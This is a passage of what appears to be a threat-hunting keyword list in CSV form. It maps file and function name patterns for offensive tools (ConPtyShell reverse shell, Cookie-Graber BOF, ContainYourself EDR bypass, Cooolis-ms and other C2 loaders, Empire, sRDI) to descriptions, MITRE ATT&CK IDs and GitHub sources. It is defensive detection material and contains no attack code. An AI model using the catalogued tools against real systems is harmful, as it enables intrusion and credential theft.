TA0010,N/A,N/A,C2,https://github.com/t3l3machus/Villain,1,0,N/A,10,10,3252,534,2023-08-08T06:24:24Z,2022-10-25T22:02:59Z -*ConPtyShell.cs*,offensive_tool_keyword,ConPtyShell,ConPtyShell - Fully Interactive Reverse Shell for Windows,T1021 - T1071,TA0002,N/A,N/A,Exploitation tools,https://github.com/antonioCoco/ConPtyShell,1,1,N/A,N/A,9,817,150,2023-01-20T10:52:52Z,2019-09-13T22:11:18Z -*ConPtyShell.exe*,offensive_tool_keyword,ConPtyShell,ConPtyShell - Fully Interactive Reverse Shell for Windows,T1021 - T1071,TA0002,N/A,N/A,Exploitation tools,https://github.com/antonioCoco/ConPtyShell,1,1,N/A,N/A,9,817,150,2023-01-20T10:52:52Z,2019-09-13T22:11:18Z -*ConPtyShell.zip*,offensive_tool_keyword,ConPtyShell,ConPtyShell - Fully Interactive Reverse Shell for Windows,T1021 - T1071,TA0002,N/A,N/A,Exploitation tools,https://github.com/antonioCoco/ConPtyShell,1,1,N/A,N/A,9,817,150,2023-01-20T10:52:52Z,2019-09-13T22:11:18Z -*ConPtyShell_dotnet2.exe*,offensive_tool_keyword,ConPtyShell,ConPtyShell - Fully Interactive Reverse Shell for Windows,T1021 - T1071,TA0002,N/A,N/A,Exploitation tools,https://github.com/antonioCoco/ConPtyShell,1,1,N/A,N/A,9,817,150,2023-01-20T10:52:52Z,2019-09-13T22:11:18Z -*-consoleoutput -DomainRecon*,offensive_tool_keyword,WinPwn,Automation for internal Windows Penetrationtest AD-Security,T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035,TA0006 - TA0007 - TA0002 - TA0005 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/S3cur3Th1sSh1t/WinPwn,1,0,N/A,N/A,10,2960,495,2023-07-13T14:09:33Z,2018-03-07T12:51:25Z -*-consoleoutput -Localrecon*,offensive_tool_keyword,WinPwn,Automation for internal Windows Penetrationtest AD-Security,T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035,TA0006 - TA0007 - TA0002 - TA0005 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/S3cur3Th1sSh1t/WinPwn,1,0,N/A,N/A,10,2960,495,2023-07-13T14:09:33Z,2018-03-07T12:51:25Z -*contact_harvester*,offensive_tool_keyword,bruteratel,A Customized Command and Control Center for Red Team and Adversary Simulation,T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047,TA0002 - TA0003,N/A,N/A,C2,https://bruteratel.com/,1,1,N/A,10,10,N/A,N/A,N/A,N/A -*ContainYourself.cpp*,offensive_tool_keyword,ContainYourself,Abuses the Windows containers framework to bypass EDRs.,T1562 - T1562.004 - T1212 - T1212.002 - T1055 - T1055.015,TA0005,N/A,N/A,Defense Evasion,https://github.com/deepinstinct/ContainYourself,1,1,N/A,10,3,257,31,2023-08-31T07:26:22Z,2023-07-12T14:47:24Z -*ContainYourself.exe*,offensive_tool_keyword,ContainYourself,Abuses the Windows containers framework to bypass EDRs.,T1562 - T1562.004 - T1212 - T1212.002 - T1055 - T1055.015,TA0005,N/A,N/A,Defense Evasion,https://github.com/deepinstinct/ContainYourself,1,1,N/A,10,3,257,31,2023-08-31T07:26:22Z,2023-07-12T14:47:24Z -*ContainYourself.sln*,offensive_tool_keyword,ContainYourself,Abuses the Windows containers framework to bypass EDRs.,T1562 - T1562.004 - T1212 - T1212.002 - T1055 - T1055.015,TA0005,N/A,N/A,Defense Evasion,https://github.com/deepinstinct/ContainYourself,1,1,N/A,10,3,257,31,2023-08-31T07:26:22Z,2023-07-12T14:47:24Z -*ContainYourself-main*,offensive_tool_keyword,ContainYourself,Abuses the Windows containers framework to bypass EDRs.,T1562 - T1562.004 - T1212 - T1212.002 - T1055 - T1055.015,TA0005,N/A,N/A,Defense Evasion,https://github.com/deepinstinct/ContainYourself,1,1,N/A,10,3,257,31,2023-08-31T07:26:22Z,2023-07-12T14:47:24Z -*ContainYourselfPoc.cpp*,offensive_tool_keyword,ContainYourself,Abuses the Windows containers framework to bypass EDRs.,T1562 - T1562.004 - T1212 - T1212.002 - T1055 - T1055.015,TA0005,N/A,N/A,Defense Evasion,https://github.com/deepinstinct/ContainYourself,1,1,N/A,10,3,257,31,2023-08-31T07:26:22Z,2023-07-12T14:47:24Z -*ContainYourselfPoc.exe*,offensive_tool_keyword,ContainYourself,Abuses the Windows containers framework to bypass EDRs.,T1562 - T1562.004 - T1212 - T1212.002 - T1055 - T1055.015,TA0005,N/A,N/A,Defense Evasion,https://github.com/deepinstinct/ContainYourself,1,1,N/A,10,3,257,31,2023-08-31T07:26:22Z,2023-07-12T14:47:24Z -*ContainYourselfPoc\*,offensive_tool_keyword,ContainYourself,Abuses the Windows containers framework to bypass EDRs.,T1562 - T1562.004 - T1212 - T1212.002 - T1055 - T1055.015,TA0005,N/A,N/A,Defense Evasion,https://github.com/deepinstinct/ContainYourself,1,0,N/A,10,3,257,31,2023-08-31T07:26:22Z,2023-07-12T14:47:24Z -*ContainYourselfTempFile.txt*,offensive_tool_keyword,ContainYourself,Abuses the Windows containers framework to bypass EDRs.,T1562 - T1562.004 - T1212 - T1212.002 - T1055 - T1055.015,TA0005,N/A,N/A,Defense Evasion,https://github.com/deepinstinct/ContainYourself,1,1,N/A,10,3,257,31,2023-08-31T07:26:22Z,2023-07-12T14:47:24Z -*ContentHijacking.swf*,offensive_tool_keyword,beef,BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.,T1201 - T1505.003,TA0001 - TA0002,N/A,N/A,Frameworks,https://github.com/beefproject/beef,1,1,N/A,N/A,10,8794,2027,2023-09-30T17:06:35Z,2011-11-23T06:53:25Z -*ConvertFrom-LDAPLogonHours*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,powerview.ps1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*Convert-NT4toCanonical*,offensive_tool_keyword,PowerSploit,PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts,T1059 - T1053 - T1003 - T1114 - T1204,TA0002 - TA0008 - TA0011,N/A,N/A,Frameworks,https://github.com/PowerShellMafia/PowerSploit,1,0,N/A,10,10,10978,4550,2020-08-17T23:19:49Z,2012-05-26T16:08:48Z -*ConvertTo-LogonHoursArray*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,0,powerview.ps1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*ConvertTo-Rc4ByteStream*,offensive_tool_keyword,empire,empire function name. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1048,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*ConvertTo-ROT13.ps1*,offensive_tool_keyword,nishang,Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.,T1550 T1555 T1212 T1558,N/A,N/A,N/A,Exploitation tools,https://github.com/samratashok/nishang,1,1,N/A,N/A,10,7849,2360,2023-09-05T07:54:08Z,2014-05-19T11:48:24Z -*ConvertTo-Shellcode -*,offensive_tool_keyword,sRDI,Shellcode Reflective DLL Injection - Shellcode implementation of Reflective DLL Injection. Convert DLLs to position independent shellcode,T1550 T1555 T1212 T1558,N/A,N/A,N/A,Exploitation tools,https://github.com/monoxgas/sRDI,1,0,N/A,N/A,10,1855,445,2022-12-14T16:01:43Z,2017-07-28T19:30:53Z -*ConvertToShellcode*,offensive_tool_keyword,nimplant,A light-weight first-stage C2 implant written in Nim,T1059-001 - T1027 - T1036,TA0002 - TA0005 - TA0002,N/A,N/A,C2,https://github.com/chvancooten/NimPlant,1,1,N/A,10,10,641,85,2023-08-31T14:52:00Z,2023-02-13T13:42:39Z -*ConvertTo-Shellcode.*,offensive_tool_keyword,sRDI,Shellcode Reflective DLL Injection - Shellcode implementation of Reflective DLL Injection. Convert DLLs to position independent shellcode,T1550 T1555 T1212 T1558,N/A,N/A,N/A,Exploitation tools,https://github.com/monoxgas/sRDI,1,1,N/A,N/A,10,1855,445,2022-12-14T16:01:43Z,2017-07-28T19:30:53Z -*ConvertTo-Shellcode.ps1*,offensive_tool_keyword,DBC2,DBC2 (DropboxC2) is a modular post-exploitation tool composed of an agent running on the victim's machine - a controler running on any machine - powershell modules and Dropbox servers as a means of communication.,T1105 - T1071.004 - T1102,TA0003 - TA0002 - TA0008,N/A,N/A,C2,https://github.com/Arno0x/DBC2,1,1,N/A,10,10,269,85,2017-10-27T07:39:02Z,2016-12-14T10:35:56Z -*ConvertToShellcode.py*,offensive_tool_keyword,EvtMute,This is a tool that allows you to offensively use YARA to apply a filter to the events being reported by windows event logging - mute the event log,T1562.004 - T1055.001 - T1070.004,TA0040 - TA0005 - TA0002,N/A,N/A,Defense Evasion,https://github.com/bats3c/EvtMute,1,1,N/A,10,3,240,46,2021-04-24T19:23:39Z,2020-08-29T00:13:20Z -*ConvertToShellcode.py*,offensive_tool_keyword,sRDI,Shellcode Reflective DLL Injection - Shellcode implementation of Reflective DLL Injection. Convert DLLs to position independent shellcode,T1550 T1555 T1212 T1558,N/A,N/A,N/A,Exploitation tools,https://github.com/monoxgas/sRDI,1,1,N/A,N/A,10,1855,445,2022-12-14T16:01:43Z,2017-07-28T19:30:53Z -*cookie_graber_x64.o*,offensive_tool_keyword,cobaltstrike,C or BOF file to extract WebKit master key to decrypt user cookie. The C code can be used to compile an executable or a bof script for Cobalt Strike.,T1552.002 - T1027.001 - T1059.003 - T1003.001,TA0006 - TA0005 - TA0002 - TA0003,N/A,N/A,C2,https://github.com/Mr-Un1k0d3r/Cookie-Graber-BOF,1,1,N/A,10,10,104,14,2023-05-28T18:41:15Z,2023-05-28T18:30:02Z -*cookie-graber.c*,offensive_tool_keyword,cobaltstrike,C or BOF file to extract WebKit master key to decrypt user cookie. The C code can be used to compile an executable or a bof script for Cobalt Strike.,T1552.002 - T1027.001 - T1059.003 - T1003.001,TA0006 - TA0005 - TA0002 - TA0003,N/A,N/A,C2,https://github.com/Mr-Un1k0d3r/Cookie-Graber-BOF,1,1,N/A,10,10,104,14,2023-05-28T18:41:15Z,2023-05-28T18:30:02Z -*cookie-graber_x64.exe*,offensive_tool_keyword,cobaltstrike,C or BOF file to extract WebKit master key to decrypt user cookie. The C code can be used to compile an executable or a bof script for Cobalt Strike.,T1552.002 - T1027.001 - T1059.003 - T1003.001,TA0006 - TA0005 - TA0002 - TA0003,N/A,N/A,C2,https://github.com/Mr-Un1k0d3r/Cookie-Graber-BOF,1,1,N/A,10,10,104,14,2023-05-28T18:41:15Z,2023-05-28T18:30:02Z -*Cookie-Graber-BOF*,offensive_tool_keyword,cobaltstrike,C or BOF file to extract WebKit master key to decrypt user cookie. The C code can be used to compile an executable or a bof script for Cobalt Strike.,T1552.002 - T1027.001 - T1059.003 - T1003.001,TA0006 - TA0005 - TA0002 - TA0003,N/A,N/A,C2,https://github.com/Mr-Un1k0d3r/Cookie-Graber-BOF,1,1,N/A,10,10,104,14,2023-05-28T18:41:15Z,2023-05-28T18:30:02Z -*CookieProcessor.exe*,offensive_tool_keyword,cobaltstrike,C or BOF file to extract WebKit master key to decrypt user cookie. The C code can be used to compile an executable or a bof script for Cobalt Strike.,T1552.002 - T1027.001 - T1059.003 - T1003.001,TA0006 - TA0005 - TA0002 - TA0003,N/A,N/A,C2,https://github.com/Mr-Un1k0d3r/Cookie-Graber-BOF,1,1,N/A,10,10,104,14,2023-05-28T18:41:15Z,2023-05-28T18:30:02Z -*cool*/cool.zip*,offensive_tool_keyword,C2 related tools,An anti-virus platform written in the Golang-Gin framework with built-in BypassAV methods such as separation and bundling.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,N/A,C2,https://github.com/Ed1s0nZ/cool,1,1,N/A,10,10,668,113,2023-07-13T07:04:30Z,2021-11-10T14:32:34Z -*CoolerVoid/0d1n*,offensive_tool_keyword,0d1n,Tool for automating customized attacks against web applications. Fully made in C language with pthreads it has fast performance.,T1583 - T1584 - T1190 - T1133,TA0002 - TA0007 - TA0040,N/A,N/A,Web Attacks,https://github.com/CoolerVoid/0d1n,1,1,N/A,N/A,,N/A,,, -*coolv0.1.exe*,offensive_tool_keyword,C2 related tools,An anti-virus platform written in the Golang-Gin framework with built-in BypassAV methods such as separation and bundling.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,N/A,C2,https://github.com/Ed1s0nZ/cool,1,1,N/A,10,10,668,113,2023-07-13T07:04:30Z,2021-11-10T14:32:34Z -*Cooolis*shellcode*,offensive_tool_keyword,C2 related tools,Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,N/A,C2,https://github.com/Rvn0xsy/Cooolis-ms,1,1,N/A,10,10,868,140,2023-05-22T22:18:47Z,2019-03-31T14:23:57Z -*CooolisAdjustTokenPrivileges*,offensive_tool_keyword,C2 related tools,Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,N/A,C2,https://github.com/Rvn0xsy/Cooolis-ms,1,1,N/A,10,10,868,140,2023-05-22T22:18:47Z,2019-03-31T14:23:57Z -*CooolisCreateRemoteThread*,offensive_tool_keyword,C2 related tools,Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,N/A,C2,https://github.com/Rvn0xsy/Cooolis-ms,1,1,N/A,10,10,868,140,2023-05-22T22:18:47Z,2019-03-31T14:23:57Z -*Cooolis-ExternalC2*,offensive_tool_keyword,C2 related tools,Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,N/A,C2,https://github.com/Rvn0xsy/Cooolis-ms,1,1,N/A,10,10,868,140,2023-05-22T22:18:47Z,2019-03-31T14:23:57Z -*Cooolis-ms.exe*,offensive_tool_keyword,C2 related tools,Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,N/A,C2,https://github.com/Rvn0xsy/Cooolis-ms,1,1,N/A,10,10,868,140,2023-05-22T22:18:47Z,2019-03-31T14:23:57Z -*Cooolis-msf*,offensive_tool_keyword,C2 related tools,Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,N/A,C2,https://github.com/Rvn0xsy/Cooolis-ms,1,1,N/A,10,10,868,140,2023-05-22T22:18:47Z,2019-03-31T14:23:57Z -*Cooolis-msX64.zip*,offensive_tool_keyword,C2 related tools,Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,N/A,C2,https://github.com/Rvn0xsy/Cooolis-ms,1,1,N/A,10,10,868,140,2023-05-22T22:18:47Z,2019-03-31T14:23:57Z -*Cooolis-msX86.zip*,offensive_tool_keyword,C2 related tools,Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,N/A,C2,https://github.com/Rvn0xsy/Cooolis-ms,1,1,N/A,10,10,868,140,2023-05-22T22:18:47Z,2019-03-31T14:23:57Z -*Cooolis-Reflective*,offensive_tool_keyword,C2 related tools,Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.,T1548.002 - T1548.003 